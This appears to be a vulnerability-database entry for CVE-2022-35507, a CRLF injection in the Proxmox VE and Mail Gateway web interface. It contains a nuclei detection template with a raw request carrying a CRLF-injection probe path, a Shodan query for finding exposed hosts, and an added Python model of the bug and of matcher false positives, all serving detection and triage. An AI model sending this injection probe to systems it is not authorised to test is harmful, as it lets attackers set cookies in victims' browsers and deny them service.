Proxmox - CRLF Injection

05 Jul 2026 03:01:21 · Reported by ProjectDiscovery · Type: nuclei · Source: github.com

Proxmox Virtual Environment (and Proxmox Mail Gateway) have a high-severity CRLF injection vulnerability in the web interface's response headers; a remote attacker can use it to set cookies in a victim's browser.

Related

Reporter                Title                                              Published
Circl                   CVE-2022-35507                                     4 Dec 2022 22:39
CNNVD                   Proxmox pve-http-server Injection Vulnerability    4 Dec 2022 00:00
CVE                     CVE-2022-35507                                     4 Dec 2022 00:00
Cvelist                 CVE-2022-35507                                     4 Dec 2022 00:00
NVD                     CVE-2022-35507                                     4 Dec 2022 19:15
OSV                     CVE-2022-35507                                     4 Dec 2022 19:15
Prion                   CRLF injection                                     4 Dec 2022 19:15
Positive Technologies   PT-2022-22874 · Proxmox +1 · Pve-Http-Server +3    4 Dec 2022 00:00
RedhatCVE               CVE-2022-35507                                     9 Jan 2026 10:39
Vulnrichment            CVE-2022-35507                                     4 Dec 2022 00:00

Code

id: CVE-2022-35507

info:
  name: Proxmox - CRLF Injection
  author: DhiyaneshDk
  severity: high
  description: |
    A response-header CRLF injection vulnerability in the Proxmox Virtual Environment (PVE) and Proxmox Mail Gateway (PMG) web interface allows a remote attacker to set cookies for a victim's browser that are longer than the server expects, causing a client-side DoS. This affects Chromium-based browsers because they allow injection of response headers with %0d. This is fixed in pve-http-server 4.1-3.
  impact: |
    Attackers can inject response headers with CRLF characters to set malicious cookies in victims' Chromium-based browsers, causing client-side denial of service and potentially facilitating session fixation attacks on Proxmox users.
  remediation: |
    Update pve-http-server to version 4.1-3 or later that properly validates and strips CRLF characters from response headers.
  reference:
    - https://git.proxmox.com/?p=pve-http-server.git%3Ba=commitdiff%3Bh=936007ae0241811093155000486da171379c23c2
    - https://github.com/advisories/GHSA-xfgp-gpjw-wmqr
    - https://starlabs.sg/blog/2022/12-multiple-vulnerabilites-in-proxmox-ve--proxmox-mail-gateway/#bug-0x02-crlf-injection-in-response-headers
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H
    cvss-score: 7.1
    cve-id: CVE-2022-35507
    cwe-id: CWE-74
    epss-score: 0.0138
    epss-percentile: 0.68792
    cpe: cpe:2.3:a:proxmox:proxmox_mail_gateway:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: proxmox
    product: proxmox_mail_gateway
    shodan-query: html:"Proxmox = {"
  tags: cve,cve2022,proxmox,crlf,vuln

http:
  - raw:
      - |
        GET /404%0dnew-header:value%0da: HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains(all_headers, 'new-header:value')"
          - "status_code == 501"
        condition: and
# digest: 490a00463044022044121c2c325a05c289f8119026dda86151f4baded3ce5bc310ee90bf735d4500022036de07bb4460c4cfc1cff0e731e5e4ddd880a694ce17d807442f2976e1b6eb4d:922c64590222798bb761d5b6d8e72950
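The template above only tells you what to send and what to look for. The following is an added example, not code from the nuclei template, from ProjectDiscovery, or from pve-http-server. It models the bug class the advisory describes with a hypothetical handler that reflects the decoded request path into a response header (the real pve-http-server code path is not reproduced here), shows why a bare %0d is enough for a lenient client such as Chromium but not for a strict CRLF-only parser, and mirrors the template's DSL matcher beside a stricter check that parses the headers first. All responses are constructed inline; the function names are assumptions.

```python
"""
Added example (not code from the nuclei template, ProjectDiscovery, or
pve-http-server). It models the response-header CRLF injection pattern that
CVE-2022-35507 describes and the check the template's matcher performs.
The handler and function names are hypothetical; the responses are constructed.
"""
from urllib.parse import unquote

# Probe path from the nuclei template. %0d decodes to a bare CR (no LF).
PROBE_PATH = "/404%0dnew-header:value%0da:"


def build_response(path: str, strip_crlf: bool) -> bytes:
    """Constructed 501 response from a hypothetical handler that reflects the
    decoded request path into a header. strip_crlf=False is the vulnerable
    pattern; strip_crlf=True removes CR and LF before use (the fix class the
    remediation text describes). This models the bug, not pve-http-server's
    actual code path."""
    decoded = unquote(path)
    if strip_crlf:
        decoded = decoded.replace("\r", "").replace("\n", "")
    lines = [
        "HTTP/1.1 501 Not Implemented",
        f"X-Requested-Path: {decoded}",
        "Content-Length: 0",
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1")


def parse_response(raw: bytes, bare_cr_ends_line: bool):
    """Return (status_code, headers_dict).

    bare_cr_ends_line=True models a lenient client such as Chromium, which
    treats a lone CR as a line terminator; False models a strict parser that
    only splits on CRLF. The difference is why the advisory says the bug
    affects Chromium-based browsers."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    head = head.replace("\r\n", "\n")
    if bare_cr_ends_line:
        head = head.replace("\r", "\n")
    status_line, *header_lines = head.split("\n")
    status = int(status_line.split(" ", 2)[1])
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return status, headers


def raw_substring_match(raw: bytes) -> bool:
    """Mirror of the template's DSL: status 501 and the raw header block
    contains the literal string 'new-header:value'."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    status_line, _, all_headers = head.partition("\r\n")
    return status_line.split(" ", 2)[1] == "501" and "new-header:value" in all_headers


def parsed_header_match(raw: bytes) -> bool:
    """Stricter confirmation: the injected text must parse as its own header
    under lenient (bare-CR) parsing, which is what a vulnerable server lets a
    Chromium client see."""
    status, headers = parse_response(raw, bare_cr_ends_line=True)
    return status == 501 and headers.get("new-header") == "value"


def demo() -> dict:
    vuln = build_response(PROBE_PATH, strip_crlf=False)
    fixed = build_response(PROBE_PATH, strip_crlf=True)
    return {
        # Lenient (Chromium-like) parsing of the vulnerable response yields a
        # separate 'new-header' header; strict CRLF parsing keeps it inside the
        # value of X-Requested-Path.
        "lenient_sees_injected": "new-header" in parse_response(vuln, True)[1],
        "strict_sees_injected": "new-header" in parse_response(vuln, False)[1],
        # The template's substring check fires on the vulnerable response, but
        # also on the hardened one in this model, because the path is still
        # reflected and 'new-header:value' survives as plain text. Parsing the
        # headers before judging a hit avoids that false positive.
        "substring_vuln": raw_substring_match(vuln),
        "substring_fixed": raw_substring_match(fixed),
        "parsed_vuln": parsed_header_match(vuln),
        "parsed_fixed": parsed_header_match(fixed),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

When triaging a hit from the template, parse the response the way a bare-CR-tolerant client would and confirm that the injected name appears as its own header; a server that still reflects the probe text but has stripped the CR will satisfy the substring match without being exploitable.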


Scores (as of 04 Feb 2026 07:00)
Vulners AI Score: 7.1 (High risk)
CVSS 3.1: 4.3 - 7.1
EPSS: 0.0138